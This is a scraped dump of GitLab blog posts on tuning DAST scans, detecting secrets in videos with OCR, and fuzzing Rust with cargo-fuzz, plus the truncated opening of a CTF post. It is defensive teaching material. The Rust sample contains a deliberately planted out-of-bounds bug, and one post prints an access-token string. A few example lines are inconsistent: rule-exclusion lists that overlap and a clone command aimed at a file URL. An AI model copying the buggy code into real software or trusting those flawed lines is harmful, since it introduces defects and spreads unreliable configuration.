Number of Executed Rules. \n\nTo optimize scan duration, we will have to tweak these factors.\n\n### How to reduce the number of tested pages\n\nTo understand which pages of our application are tested we can refer to the job log. The URLs of all tested pages are listed like in the example below.\n\n```\n2020-08-01 00:25:34,454 The following 2903 URLs were scanned:\nGET https://gitlab-review.app\nGET https://gitlab-review.app/*/*.git\nGET https://gitlab-review.app/help\nGET https://gitlab.com/help/user/index.md\n...\n```\n\nBased on this information we can exclude low-risk pages from being tested. For example, for the GitLab web app we decided to [exclude](https://gitlab.com/gitlab-org/gitlab/-/blob/8b1557c02fe5519ba952ea59c93b84912dd357b4/.gitlab/ci/dast.gitlab-ci.yml#L30) any of the [help pages](https://gitlab.com/help). These pages are mostly static and the application code doesn’t process any user-controlled inputs, which rules out attack categories like SQL injection, XSS etc. Excluding these led to 899 URLs less being spidered and tested, reducing the scan duration significantly.\n\nTo exclude low-risk pages from being tested, you can use the environment variable [DAST_AUTH_EXCLUDE_URLS](https://docs.gitlab.com/ee/user/application_security/dast/#available-variables) as mapped out below:\n\n```yaml\nscript:\n  - 'export DAST_AUTH_EXCLUDE_URLS=\"https://gitlab-review.app/help/.*,https://gitlab-review.app/profile/two_factor_auth\"' \n```\n\n`DAST_AUTH_EXCLUDE_URLS` takes a comma-separated list of URLs to exclude. URLs can contain regular expressions, e.g. `https://gitlab-review.app/help/.*` will exclude any URL that starts with `https://gitlab-review.app/help/`.\n\n### How to populate your app with test data\n\nPopulating your application with test data is important because it allows DAST to discover and test all the functionality of your application. At the same time, you want to avoid adding redundant test data to your application, which would lead to DAST exercising the same code repeatedly.\n\nFor example, we can create multiple [projects](https://docs.gitlab.com/ee/user/project/) in a GitLab instance and each project will be accessible via a unique URL, e.g. `https://gitlab.example/awesome-project`, `https://gitlab.example/another-project`, etc. To DAST these look like unrelated pages and it will test each page separately. However, the application code that is processing requests to different projects is largely identical, leading to the same code being tested multiple times. This increases the scan duration and is unlikely to identify more vulnerabilities than testing only a single project would.\n\nIn every pipeline that runs DAST against GitLab, we spin up a fresh GitLab instance as a [review app](https://docs.gitlab.com/ee/ci/review_apps/) and populate it with the test data that we need for the DAST job. If you are looking for a similar solution, you might find the job that is [deploying the review app](https://gitlab.com/gitlab-org/gitlab/-/blob/8b1557c02fe5519ba952ea59c93b84912dd357b4/.gitlab/ci/review.gitlab-ci.yml#L53-83) and seeding it with [test data](https://gitlab.com/gitlab-org/gitlab/-/blob/8b1557c02fe5519ba952ea59c93b84912dd357b4/.gitlab/ci/review.gitlab-ci.yml#L83) interesting.\n\n### Identifying relevant rules for your DAST scan\n\nAs mentioned above, a DAST full scan runs, by default, all rules against any discovered page. Therefore, another way to reduce scan duration is to disable irrelevant rules or rules that you have determined are low-risk for your application context. To determine rule relevance, consider the following:\n\n- Does the rule apply to my web framework?\n- Does the rule apply to my web server?\n- Does the rule apply to my database server?\n- Does the type of vulnerability a rule tests for apply to my application?\n\nFor example, if your application is not built with Java, rules that test for [Java-specific vulnerabilities](https://www.zaproxy.org/docs/alerts/90002/) can be disabled. There are many rules that are specific to a web framework, server, or database being used like [Apache HTTP Server](https://www.zaproxy.org/docs/alerts/10053/), [ASP.NET](https://www.zaproxy.org/docs/alerts/10061/), [PostgreSQL](https://www.zaproxy.org/docs/alerts/40022/) etc. If in doubt around which rule(s) are applicable to which tech stack, you can find the information either in the [ZAP user docs](https://www.zaproxy.org/docs/alerts/) or directly in the [rule implementation](https://github.com/zaproxy/zap-extensions/blob/master/addOns/ascanrules/src/main/java/org/zaproxy/zap/extension/ascanrules/CodeInjectionScanRule.java#L86-L91):\n\n```java\npublic boolean targets(TechSet technologies) {\n    if (technologies.includes(Tech.ASP) || technologies.includes(Tech.PHP)) {\n        return true;\n    }\n    return false;\n}\n```\nNote: Most rules classes have a function `targets` that defines to which technologies a rule is applicable.\n\nAnother example of a rule that might not apply to your application is the [PII Disclosure](https://www.zaproxy.org/docs/alerts/10062/) rule if your application does not process any PII.\n\n### Excluding irrelevant rules\n\nThe execution time of individual rules varies substantially. To understand how much time a particular rule adds to the total scan duration and how much we could gain from disabling it, we turn again to the job log. Each rule prints its duration on completion, for example:\n\n```\n[zap.out] 3937350 [Thread-8] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin https://gitlab-review.app | TestExternalRedirect in 2813.043s with 33151 message(s) sent and 0 alert\n```\n\nFrom this message we learn that rule `TestExternalRedirect` took 47 minutes to complete, hence disabling this rule reduces the scan duration by about 47 minutes.\n\nWe can disable individual rules with the environment variable `DAST_EXCLUDE_RULES`. Here is an example:\n\n```yaml\nvariables:\n  DAST_EXCLUDE_RULES=”41,42,43,10027,...,90019”\n```\n\n`DAST_EXCLUDE_RULES` takes a comma-separated list of rule ids. You can find the id of a particular rule in the summary printed to the job log:\n\n```\nPASS: External Redirect [20019]\n…\nSUMMARY - PASS: 106 | WARN: 2\n```\n\nWe can see from the log that rule External Redirect, which we found earlier to take 47 minutes, has rule id 20019. To disable this rule in addition to the rules from the previous example, we would need to add it to `DAST_EXCLUDE_RULES` like so: \n\n```yaml\nvariables:\n  DAST_EXCLUDE_RULES=”20019,41,42,43,10027,...,90019”\n```\n### Parallelizing DAST jobs to further reduce pipeline duration\n\nTo reduce the total duration of the pipeline that is running the DAST job, we can split up the rules that we want to execute into multiple DAST jobs and run the jobs in parallel. Below is an example that demonstrates how to split up the rules.\n\n```yaml\n# Any configuration that is shared between jobs goes here\n.dast-conf:\n  image:\n    name: \"registry.gitlab.com/gitlab-org/security-products/dast:1.22.1\"\n  services:\n  - name: \"gitlab/gitlab-ee:nightly\"\n    alias: gitlab\n  script:\n  - /analyze -t \"http://gitlab\"\n\n# First DAST job executing rules 6 to 10\ndast-1/2:\n  extends:\n  - .dast-conf\n  variables:\n    DAST_EXCLUDE_RULES: \"1,2,3,4,5\"\n\n# Second DAST job executing rules 1 to 5\ndast-2/2:\n  extends:\n  - .dast-conf\n  variables:\n    DAST_EXCLUDE_RULES: \"5,6,7,8,9\"\n```\n\nFor the sake of brevity, we assume in the example above that our DAST job runs rules with id 1 to 10. As described in the previous section, refer to the job log to find which rules were executed (we are working on printing a tidy [summary of executed rules](https://gitlab.com/gitlab-org/gitlab/-/issues/230893)). The example defines two DAST jobs `dast-1/2` and `dast-2/2`. `dast-1/2` is excluding rules 1 to 5 and, hence, executes rules 6 to 10. Vice versa, `dast-2/2` is excluding rules 6 to 10 and, hence, executes rules 1 to 5.\n\nFollowing the same pattern, you can split up the rules into as many jobs as necessary, keeping the rules executed in a job mutually exclusive with respect to all other jobs.\n\nNote that new releases of GitLab DAST may contain new rules, which will get executed if the rule ids are not manually added to `DAST_EXCLUDE_RULES`. In the example above, we pinned the version of the DAST image to a specific version using the `image` keyword. This allows us to review new releases manually and adjust `DAST_EXCLUDE_RULES` as necessary before upgrading to a new DAST version.\n\nWhen running multiple DAST jobs in parallel against the same target application, make sure that the application isn’t overloaded and becomes a bottleneck. If you observe connection timeouts in the DAST job logs, chances are your target site is overloaded. To mitigate this issue, consider spinning up additional instances of your target application and distribute the test load among the instances. GitLab CI offers, through the [`services`](https://docs.gitlab.com/ee/ci/docker/using_docker_images.html#what-is-a-service) keyword, a convenient way of creating a dedicated application instance for each DAST job. In the example above, we start a dedicated GitLab instance for each DAST job with:\n\n```yaml\n  services:\n  - name: \"gitlab/gitlab-ee:nightly\"\n    alias: gitlab\n```\n## Summary\n\nIn this blog post, we walked you through common challenges encountered when testing complex web applications with DAST and solutions that worked well for our internal projects at GitLab. \n\nAs we continue and broaden our use of DAST full scans within GitLab and our Security department, we’re excited to identify vulnerabilities in GitLab earlier in the SDLC and look forward to sharing interesting findings with the community. In addition, we take our lessons learned from setting up DAST full scans back to our engineering team to continue improving user experience. We also plan to explore additional dynamic testing techniques such as [fuzzing](https://docs.gitlab.com/ee/user/application_security/coverage_fuzzing/) to complement our DAST results.\n\nIs there a problem area that you’ve encountered or solution for fine-tuning DAST full scans we've missed that's worked well for you? We want to hear about it and would love your feedback below in the comments.\n\nCover image by [Pixabay](https://www.pexels.com/@pixabay) on [Pexels](https://www.pexels.com/photo/blur-bowed-stringed-instrument-classic-classical-237454/)\n{: .note}\n",[865,3091,9],"security research",{"slug":3093,"featured":6,"template":689},"how-to-configure-dast-full-scans-for-complex-web-applications","content:en-us:blog:how-to-configure-dast-full-scans-for-complex-web-applications.yml","How To Configure Dast Full Scans For Complex Web Applications","en-us/blog/how-to-configure-dast-full-scans-for-complex-web-applications.yml","en-us/blog/how-to-configure-dast-full-scans-for-complex-web-applications",{"_path":3099,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3100,"content":3106,"config":3111,"_id":3113,"_type":14,"title":3114,"_source":16,"_file":3115,"_stem":3116,"_extension":19},"/en-us/blog/how-to-detecting-secrets-in-video",{"title":3101,"description":3102,"ogTitle":3101,"ogDescription":3102,"noIndex":6,"ogImage":3103,"ogUrl":3104,"ogSiteName":673,"ogType":674,"canonicalUrls":3104,"schema":3105},"How-to: Detecting secrets in video content ","GitLab’s Security team identifies and mitigates security risks in video content by searching for API keys or other sensitive tokens. Here's how we do it (with an assist from AI) and how you can, too.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1750099421/Blog/Hero%20Images/Blog/Hero%20Images/security-checklist_security-checklist.png_1750099421443.png","https://about.gitlab.com/blog/how-to-detecting-secrets-in-video-content","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How-to: Detecting secrets in video content \",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Dennis Appelt\"}],\n        \"datePublished\": \"2024-02-29\",\n      }",{"title":3101,"description":3102,"authors":3107,"heroImage":3103,"date":3108,"body":3109,"category":865,"tags":3110},[3087],"2024-02-29","Today, we are open-sourcing our [solution for detecting secrets in video content]( https://gitlab.com/gitlab-com/gl-security/security-research/video-scanner/youtube-video-scanner). We use it internally to search videos published on our [GitLab Unfiltered YouTube channel](https://www.youtube.com/@GitLabUnfiltered) for [secrets](https://docs.gitlab.com/ee/security/token_overview.html) such as API keys and other sensitive tokens.\n\nWhile there are existing tools for secret detection, we did not find a tool that quite fit the bill for our use case, so we decided to implement a custom scanner. In this blog post, we'll walk through our general approach, some of the challenges we encountered, and our solution. We'll also discuss how GitLab’s new AI assistant, [GitLab Duo Chat](https://about.gitlab.com/gitlab-duo/), helped with the implementation of the scanner.\n\n## Scanning videos, one frame at a time\n\nOur general approach to secret detection in videos is quite simple: Split the video into frames, run optical character recognition (OCR) over each frame, and match the resulting text against known [secret patterns](https://docs.gitlab.com/ee/security/token_overview.html). If a secret is found, a [security incident](https://handbook.gitlab.com/handbook/security/security-operations/sirt/engaging-security-on-call/#engage-the-security-engineer-on-call) is kicked off to investigate the leak and revoke exposed secrets.\n\nTo implement this approach, we first experimented using [FFmpeg](https://ffmpeg.org//) for splitting the video into frames and feeding the frames to [Tesseract](https://github.com/tesseract-ocr/tesseract), an open-source engine for OCR. This worked quite well and gave us confidence that the general approach was feasible. However, we decided to switch to [Google Cloud Platform's Video Intelligence API](https://cloud.google.com/video-intelligence/docs/) for the frame splitting and OCR for the simple reason of not having to scale and maintain our own implementation.\n\nFFmpeg and Tesseract are good options if third-party APIs cannot be used or if more control over the process is required. For example, if the secrets are only exposed for a brief moment in the video, using FFmpeg allows you to increase the frame sampling rate to analyze more frames per second and increases the chances of catching the frame that exposes the secret. The Video Intelligence API does not provide a comparable level of control. \n\nThe choice between the Video Intelligence API and FFmpeg + Tesseract also depends on the data set that has to be analyzed. The Video Intelligence API works well on our data set, which makes the additional complexity of a custom implementation based on FFmpeg + Tesseract hard to justify. After settling for the Video Intelligence API, it was a natural choice to host the rest of the scanner on GCP as well. The below diagram gives an overview of the design:\n\n![video content scanners - image 1](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750099431/Blog/Content%20Images/Blog/Content%20Images/image1_aHR0cHM6_1750099431138.png)\n\nThe scanner is implemented as a collection of cloud functions running on GCP. The cloud function `WebSub API` implements the WebSub [spec](https://www.w3.org/TR/websub/), which is used by YouTube to deliver notifications. Notifications of new videos are published to a PubSub topic, which the cloud function `Video Fetcher` is subscribed to. If a message is received, the video is downloaded and submitted for OCR to the Video Intelligence API. The resulting text extract is checked for secrets by the `Secret Matcher` and alerts are created in case a secret is found.\n\n## Accounting for inaccuracies in OCR\n\nThe described approach sounds simple enough, but as with most things, the devil is in the details. When comparing the video scanner to other secret scanning methods, a notable difference is how the video scanner determines if a given string literal is a secret. Secret detection tools usually determine if the given text contains a secret by matching the text against a list of regular expressions, each defining the format of a secret. If there is a match, a secret is detected.\n\n![video content scanners - image 2](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750099431/Blog/Content%20Images/Blog/Content%20Images/image2_aHR0cHM6_1750099431139.png)\n\n\u003Ccenter>\u003Ci>A video frame showing a GitLab access token\u003C/i>\u003C/center>\n\n\u003Cp>\u003C/p>\n\nWhen it comes to video scanning, this approach has limited effectiveness due to the OCR step. In some instances, the recognized text does not quite match the text displayed in the video. For example, the above video frame shows the access token `glpat-HseyLLLE92Ubso2vyVeD` and OCR extracted the text `glpat-HseyLLLE92Ubso2vyVe\\`. The last character of the secret is `D`, but OCR extracted a backslash ( `\\`). This error causes the extracted text to no longer match the format of GitLab personal access tokens; therefore, simply matching the text against a regular expression conforming to the token format would have not detected the leaked access token.\n\nTo account for the inaccuracies that are introduced by the OCR step, the video scanner uses approximate regular expression matching where a string is not required to match a regular expression exactly, but small deviations in the strings are allowed. These deviations are expressed as string edit distance and define how many characters in the string need to be inserted, deleted, or substituted to make the string match a given regular expression. For example, the string edit distance for the previous example is 1 because the erroneously detected backslash has to be substituted with an alphanumeric character or a minus sign to make the string match the GitLab personal access token format.\n\nFinding the right value for the maximum edit distance for a string to still be considered to match a regular expression depends on the data set and requires some experimentation. If the value is too low, secrets might be missed and if the value is too high, strings that are not secrets will be matched. To find the right balance for our use case, we collected a data set of videos leaking secrets and ran them through our scanner pipeline. We measured precision (how many matches are not secrets) and recall (how many matches are relevant/true secrets) for different maximum edit distances. We collected this data for the two most relevant types of secrets: GitLab API access tokens and runner registration tokens. The below diagrams show the results.\n\nFor both types of secrets, the optimal maximum cost is 2, at which point a high precision and recall are achieved (97% precision and 91% recall for access tokens; 100% precision and 86% recall for runner registration tokens). Decreasing the maximum distance results in worse recall, while increasing the maximum cost leads to either no improvement (runner registration token) or adversely affects precision (access tokens).\n\n![video content scanner - image 3](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750099431/Blog/Content%20Images/Blog/Content%20Images/image3_aHR0cHM6_1750099431141.png)\n\n\u003Cp>\u003C/p>\n\n![video content scanner - image 4](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750099431/Blog/Content%20Images/Blog/Content%20Images/image2_aHR0cHM6_1750099431143.png)\n\n## Implementation made easy using GitLab Duo Chat\n\nAfter some initial experimentation, it was clear to us that approximate regular expression matching can increase the detection accuracy of our video scanner. However, the implementation turned out not to be trivial. While the [algorithms for approximate regular expression matching](https://www.tgries.de/agrep/) have existed since the '90s, there is no widespread library support. [TRE](https://laurikari.net/tre/) is a solid choice but is written in C and thus requires bindings to be called from the scanner’s runtime environment (Node.js).\n\nTo reduce the development effort, we turned to [GitLab Duo Chat](https://about.gitlab.com/gitlab-duo/). After discussing our options with Duo Chat for calling C from Node.js, we settled on [implementing a C++ add-on](https://nodejs.org/docs/latest-v20.x/api/addons.html). We quickly iterated towards a working implementation, which would have undoubtedly taken considerably more time without the help of GitLab Duo Chat. Below is an excerpt from the chat session.\n\n> Me: Are you familiar with the C library TRE? Can you help me write a Node.js addon that is a wrapper for TRE?\n\n> Duo: Here is the template for wrapping the TRE library in a Node.js addon using N-API:\n>\n>![video content scanner - image 5](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750099431/Blog/Content%20Images/Blog/Content%20Images/Screenshot_2024-02-28_at_9.51.14_AM_aHR0cHM6_1750099431144.png)\n>\n> The key steps are:\n> - Include TRE header\n> - Get tre regex_t from parameters\n> - Use tre_regcomp() to compile pattern\n> - Execute regexec()\n> - Handle TRE match results\n> - Return results back to JavaScript\n>\n> Let me know if this helps explain how to integrate TRE regex usage in a Node.js add-on!\n\n> Me: Ok, now let's add code for the tasks that you outlined in the template. I want to call this C++ from JavaScript like this:\n>\n>![video content scanners - image 6](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750099431/Blog/Content%20Images/Blog/Content%20Images/Screenshot_2024-02-28_at_9.53.05_AM_aHR0cHM6_1750099431145.png)\n>\n> In this example, the first parameter is the regular expression that should be used to create the parameter regex_t *preg, the second parameter is the string that should be matched against the regular expression, and the third parameter is an integer that represents TRE’s max_cost.\n\n>Duo: Here is example C++ code implementing TRE regex usage to match the provided JavaScript code snippet.\n>\n>![video content scanners - image 7](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750099431/Blog/Content%20Images/Blog/Content%20Images/Screenshot_2024-02-28_at_9.54.08_AM_aHR0cHM6_1750099431146.png)\n>\n> Let me know if you need any clarification on this implementation!\n\n> Me: Thank you for the code. Can you change the call tre_regexec to tre_regaexec?\n\n> Duo: Here is the code updated to use tre_regaexec instead of tre_regexec:\n>\n>![code updated to use tre_regaexec instead of tre_regexec](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750099431/Blog/Content%20Images/Blog/Content%20Images/Screenshot_2024-02-28_at_9.56.29_AM_aHR0cHM6_1750099431146.png)\n>\n> The key changes are:\n> - Using `tre_regaexec` instead of `tre_regexec`\n> - Initializing a `regamatch_t` instead of `regmatch_t`\n> - Passing a regaparams_t struct to configure match parameters\n> \n> Let me know if you need any clarification or have additional questions!\n\nWhile the code generation capabilities are very impressive and save a lot of time, the generated code needs review and sometimes correction. For example, in our session with Duo Chat it is prompted to call [tre_regaexec](https://laurikari.net/tre/documentation/regaexec/), but the generated code is calling the similarly named, but distinct function [tre_regexec](https://laurikari.net/tre/documentation/regexec/). Typically it is enough to make Duo Chat aware of its mistake and it will correct the code in question. In this respect, working with Duo Chat feels like pair programming rather than fully outsourcing a programming task.\n\nThe full add-on code is available [here](https://gitlab.com/gitlab-com/gl-security/security-research/video-scanner/tre-node-bindings/).\n\n## Try our open-source implementation\n\nWe are [making the implementation of the scanner open source](https://gitlab.com/gitlab-com/gl-security/security-research/video-scanner/youtube-video-scanner) under the MIT license. We hope this solution can help you with detecting secrets in your own video content. Please [share your feedback in an issue](https://gitlab.com/gitlab-com/gl-security/security-research/video-scanner/youtube-video-scanner/-/issues/new).",[752,9,865],{"slug":3112,"featured":91,"template":689},"how-to-detecting-secrets-in-video-content","content:en-us:blog:how-to-detecting-secrets-in-video.yml","How To Detecting Secrets In Video","en-us/blog/how-to-detecting-secrets-in-video.yml","en-us/blog/how-to-detecting-secrets-in-video",{"_path":3118,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3119,"content":3125,"config":3131,"_id":3133,"_type":14,"title":3134,"_source":16,"_file":3135,"_stem":3136,"_extension":19},"/en-us/blog/how-to-fuzz-rust-code",{"title":3120,"description":3121,"ogTitle":3120,"ogDescription":3121,"noIndex":6,"ogImage":3122,"ogUrl":3123,"ogSiteName":673,"ogType":674,"canonicalUrls":3123,"schema":3124},"How to fuzz Rust code continuously","Learn why you should always fuzz test your Rust code, and the code you'll need to do it.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681441/Blog/Hero%20Images/rust.jpg","https://about.gitlab.com/blog/how-to-fuzz-rust-code","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How to fuzz Rust code continuously\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Yevgeny Pats\"}],\n        \"datePublished\": \"2020-12-03\",\n      }",{"title":3120,"description":3121,"authors":3126,"heroImage":3122,"date":3128,"body":3129,"category":801,"tags":3130},[3127],"Yevgeny Pats","2020-12-03","\n\nThis blog post was originally published on the GitLab Unfiltered blog. It was reviewed and republished on 2020-12-17.\n{: .alert .alert-info .note}\n\n## What is fuzzing?\n\nFuzzing, also called [fuzz testing](/topics/devsecops/what-is-fuzz-testing/), is an automated software technique that involves providing semi-random data as an input to the test program in order to uncover bugs and crashes.\n\nIn this short tutorial we will discuss using `cargo-fuzz` for fuzzing Rust code.\n\n## Why fuzz Rust code?\n[Rust](https://www.rust-lang.org/) is a safe language (mostly) and memory corruption issues are a thing of the past so we don’t need to fuzz our code, right? Wrong!\nAny code, and especially where stability, quality, and coverage are important, is worth fuzzing.\nFuzzing can uncover logical bugs and denial-of-service issues in critical components that can lead to security issues as well.\n\nAs a reference to almost infinite amount of bugs found with cargo-fuzz (only the documented one) you can look at [the list of bugs found by fuzz-testing Rust codebases](https://github.com/rust-fuzz/trophy-case).\n\n## Cargo-fuzz\n\ncargo-fuzz is the current de-facto standard fuzzer for Rust and essentially it is a proxy layer to the well-tested [libFuzzer](https://llvm.org/docs/LibFuzzer.html) engine.\nThis means the algorithm and the interface is all based on libFuzzer, which is a widely-used, coverage-guided fuzzer for C/C++ and some other languages that implemented a proxy layer – just like cargo-fuzz.\n\nlibFuzzer (cargo-fuzz) and coverage-guided fuzzers in general have the following algorithm:\n\n```\n// pseudo code\nInstrument program for code coverage\nfor {\n  Choose random input from corpus\n  Mutate input\n  Execute input and collect coverage\n  If new coverage/paths are hit add it to corpus (corpus - directory with test-cases)\n}\n```\n\n## Building and running the fuzzer\n\nIf you are already familiar with this part you can skip to Continuous Fuzzing section.\n\nWe will start with [rust-fuzzing-example](https://gitlab.com/gitlab-org/security-products/demos/coverage-fuzzing/rust-fuzzing-example).\n\nFor the sake of the example, we have a simple [function](https://gitlab.com/gitlab-org/security-products/demos/coverage-fuzzing/rust-fuzzing-example/-/blob/master/src/lib.rs) with an off-by-one bug:\n\n```\npub fn parse_complex(data: &[u8]) -> bool{\n\tif data.len() == 5 {\n\t\tif data[0] == b'F' && data[1] == b'U' && data[2] == b'Z' && data[3] == b'Z' && data[4] == b'I' && data[5] == b'T' {\n\t\t\treturn true\n\t\t}\n\t}\n    return true;\n}\n```\n\nOur fuzz [function](https://gitlab.com/gitlab-org/security-products/demos/coverage-fuzzing/rust-fuzzing-example/-/blob/master/fuzz/fuzz_targets/fuzz_parse_complex.rs) will look like this and will be called by libFuzzer in an infinite loop with the generated data, according to the coverage-guided algorithm.\n\n```\n#![no_main]\n#[macro_use] extern crate libfuzzer_sys;\nextern crate example_rust;\n\nfuzz_target!(|data: &[u8]| {\n    let _ = example_rust::parse_complex(&data);\n});\n```\n\nTo run the fuzzer we need to build an instrumented version of the code together with the fuzz function.\ncargo-fuzz is doing for us the heavy lifting so it can be done using the following simple steps:\n\n```\n# cargo-fuzz is available in rust nightly\ndocker run -it rustlang/rust:nightly-stretch /bin/bash\ncargo install cargo-fuzz\n\n# Download the example repo, build, and run the fuzzer\ngit clone https://gitlab.com/gitlab-org/security-products/demos/coverage-fuzzing/rust-fuzzing-example/-/blob/master/fuzz/fuzz_targets/fuzz_parse_complex.rs\ncd example-rust\ncargo fuzz run fuzz_parse_complex\n\n## The output should look like this:\n#524288 pulse  cov: 105 ft: 99 corp: 6/26b lim: 517 exec/s: 131072 rss: 93Mb\n#1048576        pulse  cov: 105 ft: 99 corp: 6/26b lim: 1040 exec/s: 116508 rss: 229Mb\n==2208== ERROR: libFuzzer: deadly signal\n    #0 0x5588b8234961  (/example-rust/fuzz/target/x86_64-unknown-linux-gnu/debug/fuzz_parse_complex+0x83961)\n    #1 0x5588b8262dc5  (/example-rust/fuzz/target/x86_64-unknown-linux-gnu/debug/fuzz_parse_complex+0xb1dc5)\n    #2 0x5588b8284734  (/example-rust/fuzz/target/x86_64-unknown-linux-gnu/debug/fuzz_parse_complex+0xd3734)\n    #3 0x5588b82845e9  (/example-rust/fuzz/target/x86_64-unknown-linux-gnu/debug/fuzz_parse_complex+0xd35e9)\n    #4 0x5588b826493a  (/example-rust/fuzz/target/x86_64-unknown-linux-gnu/debug/fuzz_parse_complex+0xb393a)\n    #5 0x7f93737e70df  (/lib/x86_64-linux-gnu/libpthread.so.0+0x110df)\n    #6 0x7f9373252ffe  (/lib/x86_64-linux-gnu/libc.so.6+0x32ffe)\n    #7 0x7f9373254429  (/lib/x86_64-linux-gnu/libc.so.6+0x34429)\n    #8 0x5588b82a4a06  (/example-rust/fuzz/target/x86_64-unknown-linux-gnu/debug/fuzz_parse_complex+0xf3a06)\n    #9 0x5588b82a1b75  (/example-rust/fuzz/target/x86_64-unknown-linux-gnu/debug/fuzz_parse_complex+0xf0b75)\n    #10 0x5588b824fa1b  (/example-rust/fuzz/target/x86_64-unknown-linux-gnu/debug/fuzz_parse_complex+0x9ea1b)\n    #11 0x5588b82a442b  (/example-rust/fuzz/target/x86_64-unknown-linux-gnu/debug/fuzz_parse_complex+0xf342b)\n    #12 0x5588b82a3ee1  (/example-rust/fuzz/target/x86_64-unknown-linux-gnu/debug/fuzz_parse_complex+0xf2ee1)\n    #13 0x5588b82a3dd5  (/example-rust/fuzz/target/x86_64-unknown-linux-gnu/debug/fuzz_parse_complex+0xf2dd5)\n    #14 0x5588b82b6cd9  (/example-rust/fuzz/target/x86_64-unknown-linux-gnu/debug/fuzz_parse_complex+0x105cd9)\n    #15 0x5588b82b6c94  (/example-rust/fuzz/target/x86_64-unknown-linux-gnu/debug/fuzz_parse_complex+0x105c94)\n    #16 0x5588b824edda  (/example-rust/fuzz/target/x86_64-unknown-linux-gnu/debug/fuzz_parse_complex+0x9ddda)\n    #17 0x5588b81c45b7  (/example-rust/fuzz/target/x86_64-unknown-linux-gnu/debug/fuzz_parse_complex+0x135b7)\n    #18 0x5588b824f7e4  (/example-rust/fuzz/target/x86_64-unknown-linux-gnu/debug/fuzz_parse_complex+0x9e7e4)\n    #19 0x5588b827da53  (/example-rust/fuzz/target/x86_64-unknown-linux-gnu/debug/fuzz_parse_complex+0xcca53)\n    #20 0x5588b82a4a18  (/example-rust/fuzz/target/x86_64-unknown-linux-gnu/debug/fuzz_parse_complex+0xf3a18)\n\nNOTE: libFuzzer has rudimentary signal handlers.\n      Combine libFuzzer with AddressSanitizer or similar for better crash reports.\nSUMMARY: libFuzzer: deadly signal\nMS: 2 ShuffleBytes-ChangeByte-; base unit: 89b92cdd9bcb9b861c47c0179eff7b3a9baafcde\n0x46,0x55,0x5a,0x5a,0x49,\nFUZZI\nartifact_prefix='/example-rust/fuzz/artifacts/fuzz_parse_complex/'; Test unit written to /example-rust/fuzz/artifacts/fuzz_parse_complex/crash-df779ced6b712c5fca247e465de2de474d1d23b9\nBase64: RlVaWkk=\n```\n\nThis find the bug in a few seconds, prints the “FUZZI” string that triggers the vulnerability and saves it to a file.\n\n## Running cargo-fuzz from CI\n\nThe best way to integrate go-fuzz fuzzing with Gitlab CI/CD is by adding additional stage and step to your `.gitlab-ci.yml`. It is straightforward and [fully documented](https://docs.gitlab.com/ee/user/application_security/coverage_fuzzing/#configuration).\n\n```\ninclude:\n  - template: Coverage-Fuzzing.gitlab-ci.yml\n\nmy_fuzz_target:\n  extends: .fuzz_base\n  script:\n    - apt-get update -qq && apt-get install -y -qq git make clang cmake\n    - export CC=`which clang`\n    - export CXX=`which clang++`\n    - cargo install cargo-fuzz\n    - cargo fuzz run fuzz_parse_complex -- -runs=0\n    - ./gitlab-cov-fuzz run --regression=$REGRESSION -- ./fuzz/target/x86_64-unknown-linux-gnu/release/fuzz_parse_complex\n```\n\nFor each fuzz target you will have to create a step which extends `.fuzz_base` that runs the following:\n\n- Builds the fuzz target.\n- Runs the fuzz target via gitlab-cov-fuzz CLI.\n- For `$CI_DEFAULT_BRANCH` (can be override by `$COV_FUZZING_BRANCH`) will run fully fledged fuzzing sessions. For everything else including MRs will run fuzzing regression with the accumulated corpus and fixed crashes.\n\nThis will run your fuzz tests in a blocking manner inside your pipeline. There is also a possibility to run longer fuzz sessions asynchronously, as described in the [docs](https://docs.gitlab.com/ee/user/application_security/coverage_fuzzing/#continuous-fuzzing-long-running-async-fuzzing-jobs).\n\nCheck out our [full documentation](https://docs.gitlab.com/ee/user/application_security/coverage_fuzzing/) and the [example repo](https://gitlab.com/gitlab-org/security-products/demos/coverage-fuzzing/rust-fuzzing-example) and try adding fuzz testing to your own repos!\n\nCover image by [Zsolt Palatinus](https://unsplash.com/@sunitalap) on [Unsplash](https://unsplash.com/)\n",[9,752],{"slug":3132,"featured":6,"template":689},"how-to-fuzz-rust-code","content:en-us:blog:how-to-fuzz-rust-code.yml","How To Fuzz Rust Code","en-us/blog/how-to-fuzz-rust-code.yml","en-us/blog/how-to-fuzz-rust-code",{"_path":3138,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3139,"content":3145,"config":3151,"_id":3153,"_type":14,"title":3154,"_source":16,"_file":3155,"_stem":3156,"_extension":19},"/en-us/blog/how-to-play-gitlab-ctf-at-home",{"title":3140,"description":3141,"ogTitle":3140,"ogDescription":3141,"noIndex":6,"ogImage":3142,"ogUrl":3143,"ogSiteName":673,"ogType":674,"canonicalUrls":3143,"schema":3144},"How to play GitLab's Capture the Flag at home","Our AppSec team built and ran a CTF, and now it's available for you to play at home.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681485/Blog/Hero%20Images/gitlab_ctf.png","https://about.gitlab.com/blog/how-to-play-gitlab-ctf-at-home","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How to play GitLab's Capture the Flag at home\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Joern Schneeweisz\"}],\n        \"datePublished\": \"2020-08-12\",\n      }",{"title":3140,"description":3141,"authors":3146,"heroImage":3142,"date":3148,"body":3149,"category":865,"tags":3150},[3147],"Joern Schneeweisz","2020-08-12","\n\nThe GitLab Application Security team created a [Capture the Flag 